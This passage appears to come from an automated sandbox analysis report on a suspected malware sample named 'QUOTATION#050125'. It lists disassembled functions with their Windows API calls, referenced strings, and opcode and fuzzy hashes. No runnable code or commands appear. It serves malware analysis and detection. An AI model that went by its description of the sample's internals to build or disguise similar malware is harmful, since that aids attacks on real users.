                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 3725905772-1241985126
                                                                                      • Opcode ID: 308d0c42f6f7124e3cab3b6a753846d4b14354525f4da66b29aee3a1368a4e52
                                                                                      • Instruction ID: 5090bb3938485a6161690a36c5c875d10435fc34155902632d65c64268a50c82
                                                                                      • Opcode Fuzzy Hash: 308d0c42f6f7124e3cab3b6a753846d4b14354525f4da66b29aee3a1368a4e52
                                                                                      • Instruction Fuzzy Hash: 3D91DE710043259FDB04DF14E985FAA77E8FF84314F048469FD869A196EB30EE65CBA1
                                                                                      Function 0014055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 001405BC
                                                                                      • inet_addr.WSOCK32(?), ref: 0014061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 00140628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00140636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001406C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001406E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 001407B9
                                                                                      • WSACleanup.WSOCK32 ref: 001407BF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      • Opcode ID: 2cbdba38ca3d77db50d84e9b044d37a9fdf30fd5f726cde87b281cb4c1a2b01b
                                                                                      • Instruction ID: 46ec6937932cda903066112976072cb269d454940828f2c1cd91040e92de4694
                                                                                      • Opcode Fuzzy Hash: 2cbdba38ca3d77db50d84e9b044d37a9fdf30fd5f726cde87b281cb4c1a2b01b
                                                                                      • Instruction Fuzzy Hash: 1C916E355047019FD321DF16C889F1ABBE0EF48319F1585A9E5AA8BAB2C730ED45CF92
                                                                                      Function 0014372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 00143774
                                                                                      • CoUninitialize.OLE32 ref: 0014377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0015FB78,?), ref: 001437D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 0014384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 001438E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00143936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
                                                                                      • Opcode ID: 2e7437a3d2fcc0e8b871e3c7107ad67787b4a1c4c021b8f4029a94717d489747
                                                                                      • Instruction ID: a68b9cca5c21f14b03ff3c3909b64a83985707390734239b18386596a754176e
                                                                                      • Opcode Fuzzy Hash: 2e7437a3d2fcc0e8b871e3c7107ad67787b4a1c4c021b8f4029a94717d489747
                                                                                      • Instruction Fuzzy Hash: 1E619F70608302AFD311DF54C849F6ABBE4EF48715F10091DF9A59B2A1D770EE49CBA2
                                                                                      Function 0012DC0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0012DC20
                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0012DC46
                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0012DCBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileInfoVersion$QuerySizeValue
                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                      • API String ID: 2179348866-1459072770
                                                                                      • Opcode ID: 6af5a968e2a67c1cfa923ab09e1f071eae49493f0d6723db5d0b7335fc41bb2c
                                                                                      • Instruction ID: 2a1cc05b5ad6869759eb14e684a51ea5eebc6631de531b13ed35e3c05582e572
                                                                                      • Opcode Fuzzy Hash: 6af5a968e2a67c1cfa923ab09e1f071eae49493f0d6723db5d0b7335fc41bb2c
                                                                                      • Instruction Fuzzy Hash: F641F032940315BEDB04ABA5EC07EFF37ACEF56750F10406AF901B6183EB759A1087A5
                                                                                      Function 00133388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001333CF
                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001333F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 2948472770-3080491070
                                                                                      • Opcode ID: 3ec4058028e1994fe5b1ee4dc95d483b269a20ccb2891e310a4065b0b4fc8d68
                                                                                      • Instruction ID: 36e924fd50358d9118c302788eddd9b6c2222d9d206992a04a254c8bf0dac739
                                                                                      • Opcode Fuzzy Hash: 3ec4058028e1994fe5b1ee4dc95d483b269a20ccb2891e310a4065b0b4fc8d68
                                                                                      • Instruction Fuzzy Hash: EA517C7290020ABADF15EBA0DD46EEEB778AF14340F204169F515720A2EB356F98DF61
                                                                                      Function 00135393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 001353A0
                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00135416
                                                                                      • GetLastError.KERNEL32 ref: 00135420
                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 001354A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                      • API String ID: 4194297153-14809454
                                                                                      • Opcode ID: 4081636c80a8997c774608b7ae5de75718b1bb8d793b99d4416d7a23f8ebc72c
                                                                                      • Instruction ID: 0315036e26ba01cc1ce12fe7910c2a295f220f09759db5f0bde4934cd67933d9
                                                                                      • Opcode Fuzzy Hash: 4081636c80a8997c774608b7ae5de75718b1bb8d793b99d4416d7a23f8ebc72c
                                                                                      • Instruction Fuzzy Hash: FF318D35A00604DFC718DF68C984FAABBB5EB45715F148069E805DB292EB71DE86CBA0
                                                                                      Function 00153C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 00153C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 00153C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00153D10
                                                                                      • IsMenu.USER32(?), ref: 00153D24
                                                                                      • CreatePopupMenu.USER32 ref: 00153D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00153D5B
                                                                                      • DrawMenuBar.USER32 ref: 00153D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F
                                                                                      • API String ID: 161812096-3044882817
                                                                                      • Opcode ID: 6772cbe6385cfe6006e3d71b71bc939022e5bd81208c55377085fe4f47a40b1a
                                                                                      • Instruction ID: 9f46a3dc4b3be3834a698d122e9fd438318998bec5941e9d471f1785ca7643af
                                                                                      • Opcode Fuzzy Hash: 6772cbe6385cfe6006e3d71b71bc939022e5bd81208c55377085fe4f47a40b1a
                                                                                      • Instruction Fuzzy Hash: 64415675A01309EFDB14CFA4D844BAA7BB5FF49391F140029ED66AB360D770AA54CF90
                                                                                      Function 00121EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00121F64
                                                                                      • GetDlgCtrlID.USER32 ref: 00121F6F
                                                                                      • GetParent.USER32 ref: 00121F8B
                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00121F8E
                                                                                      • GetDlgCtrlID.USER32(?), ref: 00121F97
                                                                                      • GetParent.USER32(?), ref: 00121FAB
                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00121FAE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2573188126-1403004172
                                                                                      • Opcode ID: aa8f7ef9871606c420abb98dfd607f8b6098e6ac083c8e1d4f139a7c1ee80cc8
                                                                                      • Instruction ID: 6b52fd3a0c6a7ee6e3caa7dad738c3022a4dc41338a2a09a1e30f5e4b449cef3
                                                                                      • Opcode Fuzzy Hash: aa8f7ef9871606c420abb98dfd607f8b6098e6ac083c8e1d4f139a7c1ee80cc8
                                                                                      • Instruction Fuzzy Hash: 7B21C270900224BFCF04EFA0DC85EEEBBB9EF19350B000119F961672D1DB345A68DBA0
                                                                                      Function 00121FC0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00122043
                                                                                      • GetDlgCtrlID.USER32 ref: 0012204E
                                                                                      • GetParent.USER32 ref: 0012206A
                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0012206D
                                                                                      • GetDlgCtrlID.USER32(?), ref: 00122076
                                                                                      • GetParent.USER32(?), ref: 0012208A
                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0012208D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2573188126-1403004172
                                                                                      • Opcode ID: b75bbc703fe5a63fd9046756e3b5374410122494d61ff8033adf45b6b2fb05b0
                                                                                      • Instruction ID: 4ce01c5a52e68795f26b9edb8fc0bddad3bde46f4d12dfa3402c7b0f7c397894
                                                                                      • Opcode Fuzzy Hash: b75bbc703fe5a63fd9046756e3b5374410122494d61ff8033adf45b6b2fb05b0
                                                                                      • Instruction Fuzzy Hash: 5121C271A00214BFCF14AFA0DC85EEEBBB8EF15340F000415F951A72A1CB795A64DB64
                                                                                      Function 00143C30 Relevance: 15.3, APIs: 10, Instructions: 344fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00143C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 00143C8A
                                                                                      • CoUninitialize.OLE32 ref: 00143C94
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00143DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00143ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00143F0E
                                                                                      • CoGetObject.OLE32(?,00000000,0015FB98,?), ref: 00143F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00143F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00143FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00143FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2395222682-0
                                                                                      • Opcode ID: 85be2c767c776b56c02f5d746bc9f2c1c05caf88e5439ccf48afb8b93c69f85e
                                                                                      • Instruction ID: bf9b1c57f587a15db3651fe17e555c5cfcb80080e9e6a9a1d19609d508ccd787
                                                                                      • Opcode Fuzzy Hash: 85be2c767c776b56c02f5d746bc9f2c1c05caf88e5439ccf48afb8b93c69f85e
                                                                                      • Instruction Fuzzy Hash: A9C123716083019FD700DF68C88496BB7E9FF89744F10491DF99A9B261D731EE46CB92
                                                                                      Function 00153A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00153A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00153AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00153AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00153AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00153B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00153BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00153BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00153BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00153BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00153C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 312131281-0
                                                                                      • Opcode ID: 268f5ab9cf9e56b9a3c2797d187ac24cb93fddb279d7ca1405e4db3bb1196884
                                                                                      • Instruction ID: 155fd9d9a430ba34d66c5c31a73d9773ebc8ebe6383cab2034a8a8e962f4848e
                                                                                      • Opcode Fuzzy Hash: 268f5ab9cf9e56b9a3c2797d187ac24cb93fddb279d7ca1405e4db3bb1196884
                                                                                      • Instruction Fuzzy Hash: 03617D75900248EFDB11DF68CC81EEE77B8EB09704F10019AFA25EB291C770AE85DB50
                                                                                      Function 0012B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0012B151
                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B165
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0012B16C
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B17B
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0012B18D
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1A6
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1B8
                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B1FD
                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B212
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0012A1E1,?,00000001), ref: 0012B21D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2156557900-0
                                                                                      • Opcode ID: ce6ce91d7e0a40c5bf98e1defffd55e89edd840974f165ba5ad9ac37fe9e1282
                                                                                      • Instruction ID: 1b4a304dbdd65811d61518f5bfa29920f329e0232cb87178a1fbf0754cbc6ab4
                                                                                      • Opcode Fuzzy Hash: ce6ce91d7e0a40c5bf98e1defffd55e89edd840974f165ba5ad9ac37fe9e1282
                                                                                      • Instruction Fuzzy Hash: FB319C75514314FFDB10DF24EC88B7EBBA9BB51312F144006FA11DA691D7B4AAA0CFA0
                                                                                      Function 001230F7 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 400COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                      • API String ID: 0-1603158881
                                                                                      • Opcode ID: 00c441e81a6089ce720a64ec8007df639cba6ee77662d1f387ecb5788f41c859
                                                                                      • Instruction ID: 247c8405862d2c4b2935202e5087541e389075fec99b45b63e3c799692ec0870
                                                                                      • Opcode Fuzzy Hash: 00c441e81a6089ce720a64ec8007df639cba6ee77662d1f387ecb5788f41c859
                                                                                      • Instruction Fuzzy Hash: F3E11632A00626ABCB18EF64D451BEDFBB1FF14710F15811AE466F7241DB34AFA58B90
                                                                                      Function 000C1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000C1459
                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 000C14F8
                                                                                      • UnregisterHotKey.USER32(?), ref: 000C16DD
                                                                                      • DestroyWindow.USER32(?), ref: 001024B9
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0010251E
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0010254B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                      • String ID: close all
                                                                                      • API String ID: 469580280-3243417748
                                                                                      • Opcode ID: 85060f79e860a94ffeb20f21aff0ceca2dc3c32463a8af684bebb5e5c33ab721
